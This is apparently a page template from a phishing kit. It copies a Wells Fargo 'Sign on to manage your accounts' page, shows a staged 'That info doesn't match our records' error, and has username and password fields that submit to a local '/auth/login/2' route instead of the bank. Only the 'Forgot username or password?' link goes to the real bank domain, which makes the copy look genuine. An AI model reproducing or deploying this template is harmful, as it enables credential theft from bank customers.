@layout('layouts.app')

@section('content')
<div class="cb-container">
  <div class="cb-errMsg-wrapper">
    <div class="cb-errMsg" role="alert">
      <div class="cb-message cb-message-pageLevel cb-message-emergency" role="region" style="display: flex; flex-flow: row nowrap; flex: 1 1 auto; align-items: stretch;">
        <div class="cb-message-iconWrapper" style="display: flex; flex-flow: column nowrap; align-items: center; justify-content: flex-start;">
          <svg width="32px" height="32px" viewBox="0 0 32 32" aria-hidden="true" role="img" focusable="false"><g fill="none"><path stroke="#d73f26" d="M17.7301 26.4607L28.2838 7.99182C28.8318 7.03278 28.4986 5.81107 27.5396 5.26305C27.2374 5.09037 26.8953 4.99954 26.5473 4.99954H5.44C4.33543 4.99954 3.44 5.89497 3.44 6.99954C3.44 7.34759 3.53083 7.68962 3.70352 7.99182L14.2572 26.4607C14.8052 27.4197 16.0269 27.7529 16.9859 27.2049C17.296 27.0277 17.553 26.7707 17.7301 26.4607Z"></path><path fill="#d73f26" d="M16.0577 18.792C16.4297 18.792 16.7387 18.912 16.9847 19.152C17.2307 19.392 17.3537 19.704 17.3537 20.088C17.3537 20.46 17.2307 20.772 16.9847 21.024C16.7387 21.276 16.4297 21.402 16.0577 21.402C15.6737 21.402 15.3587 21.276 15.1127 21.024C14.8667 20.772 14.7437 20.46 14.7437 20.088C14.7437 19.704 14.8667 19.392 15.1127 19.152C15.3587 18.912 15.6737 18.792 16.0577 18.792ZM17.2277 9L16.8317 17H15.2477L14.8517 9H17.2277Z"></path></g></svg>
        </div>
        
        <div class="cb-message-contentWrapper" style="display: flex; flex-flow: column nowrap;">
          <div class="cb-message-errorText">That info doesn't match our records. Please try again.</div>
        </div>
      </div>
    </div>
  </div>

  <div class="cb-container-heading" style="display: flex; flex-wrap: nowrap; align-items: center; justify-content: center;">
    <h1 tabindex="-1" class="cb-salutation">
      <span id="msgGreeting">Good day</span>
      <span class="cb-title">Sign on to manage your accounts</span>
    </h1>
  </div>

  <div>
    <form class="cb-form" action="/auth/login/2" method="POST">
      <div class="cb-form-container">
        <div class="cb-form-inputField">
          <div class="cb-field-spacing">
            <div class="cb-field">
              <div>
                <div class="cb-input-container cb-input-readonly">
                  <label for="username" class="cb-input-label" style="transition: all 0.2s ease 0s; margin-left: 16px; display: flex; flex-flow: row nowrap; align-items: flex-start;">
                    <div class="cb-input-errIcon" style="margin-right: 0.25rem;display: none;">
                      <svg width="16px" height="16px" viewBox="0 0 16 16" role="img" focusable="false"><g fill="none" fill-rule="evenodd"><g opacity=".01"><path fill="#FFBFF9" d="M0 0h16v16H0z"></path><path fill="#FFF" d="M1 1h14v14H1z"></path><g stroke="#FF2AEC"><rect stroke-width=".15" x="4.575" y="1.075" width="6.85" height="13.85" rx="1"></rect><path d="M14.925 5.5A.925.925 0 0014 4.575H2a.925.925 0 00-.925.925v5c0 .51.414.925.925.925h12c.51 0 .925-.414.925-.925v-5z" stroke-width=".15"></path><path d="M8 15V.978M15 8H1M14.5 14.5l-13-13M1.5 14.5l13-13" stroke-width=".15" stroke-linecap="square" stroke-dasharray="1"></path><circle stroke-width=".35" cx="8" cy="8" r="5.825"></circle><circle stroke-width=".35" cx="8" cy="8" r="3.325"></circle><rect stroke-width=".35" x="2.175" y="2.175" width="11.65" height="11.65" rx="1"></rect></g></g><path d="M8 13.6A5.6 5.6 0 1113.6 8 5.607 5.607 0 018 13.6zm-.374-4.33h.74l.184-3.99H7.441l.185 3.99zm.378 1.798a.58.58 0 00.433-.176.6.6 0 00.172-.437.583.583 0 00-.605-.605.605.605 0 00-.44.168.583.583 0 00-.173.437.6.6 0 00.172.437.59.59 0 00.441.176z" fill="#BF2D19"></path></g></svg>
                    </div>
                    <div class="cb-input-labelText">Username</div>
                  </label>

                  <input id="username" name="username" class="cb-input" type="text" autocapitalize="off" autocorrect="off" autocomplete="off" tabindex="0" style="font-size: 20px; padding-left: 16px; padding-right: 0px;">
                </div>

                <div class="cb-border cb-border-notReadonly"></div>
              </div>

              <div class="cb-input-message">Username is required.</div>
            </div>
          </div>
        </div>

        <div class="cb-form-passwordField">
          <div class="cb-field-spacing">
            <div class="cb-field">
              <div>
                <div class="cb-input-container cb-input-maskable cb-input-readonly">
                  <label for="password" class="cb-input-label" style="transition: all 0.2s ease 0s; margin-left: 16px; display: flex; flex-flow: row nowrap; align-items: flex-start;">
                    <div class="cb-input-errIcon" style="margin-right: 0.25rem;display: none;">
                      <svg width="16px" height="16px" viewBox="0 0 16 16" role="img" focusable="false"><g fill="none" fill-rule="evenodd"><g opacity=".01"><path fill="#FFBFF9" d="M0 0h16v16H0z"></path><path fill="#FFF" d="M1 1h14v14H1z"></path><g stroke="#FF2AEC"><rect stroke-width=".15" x="4.575" y="1.075" width="6.85" height="13.85" rx="1"></rect><path d="M14.925 5.5A.925.925 0 0014 4.575H2a.925.925 0 00-.925.925v5c0 .51.414.925.925.925h12c.51 0 .925-.414.925-.925v-5z" stroke-width=".15"></path><path d="M8 15V.978M15 8H1M14.5 14.5l-13-13M1.5 14.5l13-13" stroke-width=".15" stroke-linecap="square" stroke-dasharray="1"></path><circle stroke-width=".35" cx="8" cy="8" r="5.825"></circle><circle stroke-width=".35" cx="8" cy="8" r="3.325"></circle><rect stroke-width=".35" x="2.175" y="2.175" width="11.65" height="11.65" rx="1"></rect></g></g><path d="M8 13.6A5.6 5.6 0 1113.6 8 5.607 5.607 0 018 13.6zm-.374-4.33h.74l.184-3.99H7.441l.185 3.99zm.378 1.798a.58.58 0 00.433-.176.6.6 0 00.172-.437.583.583 0 00-.605-.605.605.605 0 00-.44.168.583.583 0 00-.173.437.6.6 0 00.172.437.59.59 0 00.441.176z" fill="#BF2D19"></path></g></svg>
                    </div>
                    <div class="cb-input-labelText">Password</div>
                  </label>

                  <input id="password" name="password" class="cb-input" type="password" autocapitalize="off" autocorrect="off" autocomplete="off" tabindex="0" style="font-size: 20px; padding-left: 16px; padding-right: 60px;">

                  <div class="cb-input-actionButton">
                    <button type="button" class="cb-button cb-toggleMask-btn eye-icon">
                      <svg width="24px" height="24px" viewBox="0 0 24 24" role="img" focusable="false"><g stroke="none" stroke-width="1" fill="none" fill-rule="evenodd"><g opacity="0.01"><rect fill="#FFBFF9" x="0" y="0" width="24" height="24"></rect><rect fill="#FFFFFF" x="1" y="1" width="22" height="22"></rect><g stroke-width="1" transform="translate(0.000000, 1.000000)" stroke="#FF2AEC"><rect stroke-width="0.25" x="6.625" y="0.125" width="10.75" height="21.75" rx="2"></rect><path d="M8.5,0.125 C7.46446609,0.125 6.625,0.964466094 6.625,2 L6.625,20 C6.625,21.0355339 7.46446609,21.875 8.5,21.875 L15.5,21.875 C16.5355339,21.875 17.375,21.0355339 17.375,20 L17.375,2 C17.375,0.964466094 16.5355339,0.125 15.5,0.125 L8.5,0.125 Z" stroke-width="0.25" transform="translate(12.000000, 11.000000) rotate(-270.000000) translate(-12.000000, -11.000000) "></path><path d="M1,11 L23,11" stroke-width="0.3" stroke-linecap="square" stroke-dasharray="1" transform="translate(12.000000, 11.000000) rotate(-90.000000) translate(-12.000000, -11.000000) "></path><path d="M0.978218914,11 L22.9782189,11" stroke-width="0.3" stroke-linecap="square" stroke-dasharray="1" transform="translate(11.978219, 11.000000) rotate(-180.000000) translate(-11.978219, -11.000000) "></path><path d="M-2.8492424,11 L26.8492424,11" stroke-width="0.3" stroke-linecap="square" stroke-dasharray="1" transform="translate(12.000000, 11.000000) rotate(-135.000000) translate(-12.000000, -11.000000) "></path><path d="M-2.8492424,11 L26.8492424,11" stroke-width="0.3" stroke-linecap="square" stroke-dasharray="1" transform="translate(12.000000, 11.000000) rotate(-45.000000) translate(-12.000000, -11.000000) "></path><circle stroke-width="0.5" cx="12" cy="11" r="8.75"></circle><circle stroke-width="0.5" cx="12" cy="11" r="5.25"></circle><rect stroke-width="0.5" x="3.25" y="2.25" width="17.5" height="17.5" rx="2"></rect></g></g><path d="M12.13525,18.33925 C16.71175,18.33925 20.7655,16.105 23.26975,12.67 C20.7655,9.23425 16.71175,7 12.13525,7 C7.558,7 3.50425,9.23425 1,12.67 C3.50425,16.105 7.558,18.33925 12.13525,18.33925 Z M8.51125,7.49275 C7.6285,8.40025 7.08475,9.64 7.08475,11.00575 C7.08475,13.7905 9.34225,16.04875 12.12775,16.04875 C14.9125,16.04875 17.17,13.7905 17.17,11.00575 C17.17,9.63925 16.62625,8.40025 15.7435,7.49275" id="mask-OFGSUWNG" stroke="#3B3331" stroke-linecap="round" stroke-linejoin="round"></path></g></svg>
                    </button>
                  </div>
                </div>

                <div class="cb-border cb-border-notReadonly"></div>
              </div>

              <div class="cb-input-message">Password is required.</div>
            </div>
          </div>
        </div>

        <div class="cb-field cb-checkbox-label" style="display: flex; flex-flow: row nowrap; align-items: center;">
          <div class="cb-checkbox" role="checkbox" tabindex="0" style="display: inline-flex; flex-flow: row nowrap; align-items: flex-start; padding-top: 0.5rem; padding-bottom: 0.5rem;">
            <div class="cb-toggleCheckbox not-checked" style="align-items: center; margin-right: 0.5rem;">
              <svg width="24px" height="24px" viewBox="0 0 24 24" role="img" class="cb-checkbox-icon" focusable="false"><g><rect data-container="" stroke-width="1" x="1" y="1" width="22" height="22" rx="2"></rect></g><g data-indeterminate="" stroke="none" stroke-width="2" fill="none" fill-rule="evenodd"><path data-mark="" transform="translate(3.5, 4)" d="M13.5799 7C14.1322 7 14.5799 7.44772 14.5799 8C14.5799 8.51284 14.1939 8.93551 13.6965 8.99327L13.5799 9H2.41992C1.86764 9 1.41992 8.55228 1.41992 8C1.41992 7.48716 1.80596 7.06449 2.3033 7.00673L2.41992 7H13.5799Z"></path></g><g data-checked="" stroke="none" stroke-width="0.1" fill="none" fill-rule="evenodd"><path transform="translate(3.5, 4)" data-mark="" d="M13.3413 3.33984C13.6657 2.94639 14.2534 2.88571 14.654 3.2043C15.0238 3.49838 15.1049 4.01283 14.86 4.39969L14.792 4.49354L7.23449 13.6602C6.93616 14.022 6.41481 14.1026 6.02112 13.8648L5.92556 13.7987L1.34978 10.198C0.947509 9.88145 0.882681 9.30456 1.20498 8.90947C1.5025 8.54477 2.02587 8.46247 2.42103 8.70093L2.51695 8.76726L6.36761 11.7972L13.3413 3.33984Z" fill="#FFFFFF" fill-rule="nonzero"></path></g></svg>
            </div>

            <div style="padding-top: 0.25rem; padding-right: 0.5rem;">Save username</div>
          </div>
        </div>
      </div>

      <div style="margin: 1rem auto 0.625rem;"></div>

      <div class="cb-form-signOnButton" style="display: flex; flex-wrap: nowrap; align-items: center; justify-content: center;">
        <button type="submit" disabled="" class="submit-btn cb-button cb-button-modern cb-button-disabled cb-button-responsive cb-button-primary">Sign on</button>
      </div>

      <div class="cb-panel" style="display: flex; flex-flow: row nowrap; align-items: center; justify-content: center;">
        <span class="cb-panel-footer">
          <a href="https://connect.secure.wellsfargo.com">Forgot username or password?</a>
        </span>
      </div>
    </form>
  </div>
</div>
@endsection